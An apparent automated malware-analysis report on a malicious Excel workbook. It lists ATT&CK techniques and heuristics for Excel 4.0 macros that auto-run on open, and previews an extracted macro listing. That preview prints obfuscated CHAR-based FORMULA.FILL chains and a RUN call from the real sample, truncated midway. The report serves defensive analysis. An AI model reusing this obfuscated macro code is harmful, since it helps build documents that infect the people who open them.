MALICIOUS
140
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1203 Exploitation for Client Execution
The critical heuristics indicate the presence of Excel 4.0 macros with an Auto_Open entry, which is a known technique for executing malicious code upon opening the document. The `RUN` function (API ID 37) and a numerical value (API ID 42) are identified as dangerous formulas, suggesting the macro is designed to execute commands. The macro sheet is likely used to download and execute a second-stage payload.
Heuristics 3
-
Excel 4.0 Auto_Open defined name critical OLE_XLM_AUTOOPEN_DEFINEDNAMEoletools recovered an Auto_Open / Auto_Close entry from an Excel 4.0 macro sheet. The raw BIFF name can be tokenized or partially opaque to byte-string checks, but the recovered macro listing confirms the workbook has an XLM auto-execution entry.
-
XLM Auto_Open with dangerous formula APIs critical OLE_XLM_DANGEROUS_FNExcel 4.0 macro sheet contains an Auto_Open / Auto_Close entry and dangerous XLM formula APIs that can invoke programs, write files, or transfer control without VBA.
-
Excel 4.0 (XLM) macro sheet present medium OLE_XLM_AUTOOPENWorkbook contains an Excel 4.0 macro sheet sub-stream — XLM is rarely seen in modern legitimate workbooks and was a major Office malware vector during 2020-2022.
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
xlm_macros.txt |
xlm-macro | oletools.olevba.extract_all_macros (XLM macro listing) | 126486 bytes |
SHA-256: 92b60d30c3d53726280f61695c1343c982544130bb193d584d64ffe467e4c27c |
|||
Preview scriptFirst 1,000 lines of the extracted script
' 0085 14 BOUNDSHEET : Sheet Information - worksheet or dialog sheet, visible - Sheet ' 0085 14 BOUNDSHEET : Sheet Information - Excel 4.0 macro sheet, visible - Sheet ' 0018 28 LABEL : Cell Value, String Constant - built-in-name 1 Auto_Open hidden len=7 ptgRef3d Sheet!DF42699 ' 002a 2 PRINTHEADERS : Print Row/Column Labels ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 002a 2 PRINTHEADERS : Print Row/Column Labels ' Sheet,Reference,Formula,Value ' Sheet,BT12,"",2.94285614285714292038 ' Sheet,FH33,"",174.00000000000000000000 ' Sheet,CG34,"",172.37500000000000000000 ' Sheet,JA115,"",-1.25791139240506333330 ' Sheet,N157,"",-0.11034482758620689502 ' Sheet,FS164,"",-1.86486486486486491287 ' Sheet,BM214,"",-1.44021739130434789367 ' Sheet,H254,"",-4.02222222222222214327 ' Sheet,CG338,"",-0.40251572327044027322 ' Sheet,BH362,"",0.22612558045628911030 ' Sheet,HZ424,"",415.00000000000000000000 ' Sheet,DY611,"",0.15841584158415841777 ' Sheet,FU655,"",-1.72380952380952390257 ' Sheet,FS683,"",2.84782608695652195152 ' Sheet,EN719,"",130.00000000000000000000 ' Sheet,GD728,"",601.00000000000000000000 ' Sheet,BC762,"",-259.00000000000000000000 ' Sheet,CF844,"",-492.00000000000000000000 ' Sheet,G936,"",242.00000000000000000000 ' Sheet,CZ1039,"",292.00000000000000000000 ' Sheet,Q1119,"",-195.00000000000000000000 ' Sheet,CQ1236,"",-2.70149253731343286233 ' Sheet,IK1238,"",-425.00000000000000000000 ' Sheet,BN1351,"",526.00000000000000000000 ' Sheet,CG1371,"",-192.00000000000000000000 ' Sheet,FN1388,"",597.00000000000000000000 ' Sheet,IS1395,"",-32.40001953125000255795 ' Sheet,BI1403,"",119.00000000000000000000 ' Sheet,IS1425,"",-4.52500000000000035527 ' Sheet,EX1454,"",-0.08858267716535432601 ' Sheet,BN1465,"",0.41603053435114506486 ' Sheet,ER1618,"",-412.30031250000001818989 ' Sheet,BT1664,"",183.00000000000000000000 ' Sheet,EZ1669,"",-3.41509433962264141726 ' Sheet,BA1676,"",-1.25791139240506333330 ' Sheet,JM1685,"",595.00000000000000000000 ' Sheet,GM1787,"",8.06521739130434767162 ' Sheet,DW1870,"FORMULA.FILL(CHAR(HF3534-CU43197)&CHAR(L37457*FM5399)&CHAR(FD55734/HS59065)&CHAR(DG54512-ID40497)&CHAR(DG54512+DO9616)&CHAR(DG54512-FV42992)&CHAR(I4978*JU30840)&CHAR(FD55734*BJ43131)&CHAR(JS56319/HQ64661)&CHAR(JS56319/HE4367)&CHAR(I4978*FR49912)&CHAR(DT8029+EL34338)&CHAR(JS56319*FE21444)&CHAR(DG54512-IR54496)&CHAR(FD55734/CI5064)&CHAR(HF3534*BH43676)&CHAR(DT8029+FV7357)&CHAR(JS56319+FH27264)&CHAR(DG54512*A52704)&CHAR(GJ53409-Y57798)&CHAR(DG54512/IE24403)&CHAR(JS56319-IK7208)&CHAR(HF3534-GC10465)&CHAR(EV18137*DF51538)&CHAR(JS56319-GG59638)&CHAR(GJ53409*FS1939)&CHAR(EV18137-DD48098)&CHAR(I4978/JJ34358)&CHAR(GJ53409+DK39293)&CHAR(JS56319-HB49858)&CHAR(FD55734-EJ56591)&CHAR(FD55734+EN65508)&CHAR(JS56319-JM26926)&CHAR(HR60734/EZ1669)&CHAR(DT8029-DF41622)&CHAR(HF3534-EZ61390)&CHAR(EV18137/HP44292)&CHAR(FD55734+BL15711)&CHAR(DG54512*II8871)&CHAR(L37457/FA60130)&CHAR(DT8029+DX13720)&CHAR(EV18137-JB29835)&CHAR(L37457-IY41435)&CHAR(GJ53409+GB4354)&CHAR(I4978/GY34360)&CHAR(L37457-IS9204)&CHAR(I4978/GN57064)&CHAR(L37457*V9070)&CHAR(EV18137*GL19475)&CHAR(L37457*BQ40048)&CHAR(FD55734/IN29941)&CHAR(L37457/FY7078)&CHAR(GJ53409/DT26401)&CHAR(HR60734*HB39025)&CHAR(I4978*HX10223)&CHAR(DG54512/JL28799)&CHAR(EV18137-CM62837)&CHAR(JS56319-GP55541)&CHAR(JS56319+JK20569)&CHAR(FD55734*FT19594)&CHAR(EV18137/FO3021)&CHAR(L37457*BN8218)&CHAR(I4978-GX58480)&CHAR(DT8029*CF46477)&CHAR(FD55734-CK23476),DW1871)","" ' Sheet,DW1872,RUN(HQ29905),"" ' Sheet,JI1902,"FORMULA.FILL(CHAR(EV18137/E5096)&CHAR(I4978/JQ4072)&CHAR(DT8029/IN59597)&CHAR(HR60734*CI44637)&CHAR(HR60734/EF55618)&CHAR(EV18137+IJ47291)&CHAR(L37457*GJ33013)&CHAR(DG54512+GT15470)&CHAR(HF3534/BE4059)&CHAR(FD55734+DU60341)&CHAR(GJ53409-EO49890)&CHAR(I4978-ET52087)&CHAR(GJ53409+G936)&CHAR(GJ53409/DW48955)&CHAR(HR60734-CD61410)&CHAR(GJ53409-HO63236)&CHAR(HR60734/IJ48604)&CHAR(HR60734/EX28853)&CHAR(HF3534/IG9794)&CHAR(HR60734+A26731)&CHAR(L37457-JS8700)&CHAR(FD55734+JA9982)&CHAR(DG54512*N41190)&CHAR(EV18137*GY52082)&CHAR(L37457/HK45229)&CHAR(HF35 ... (truncated) |
|||
Open this report in the interactive analyzer, or submit your own file for analysis.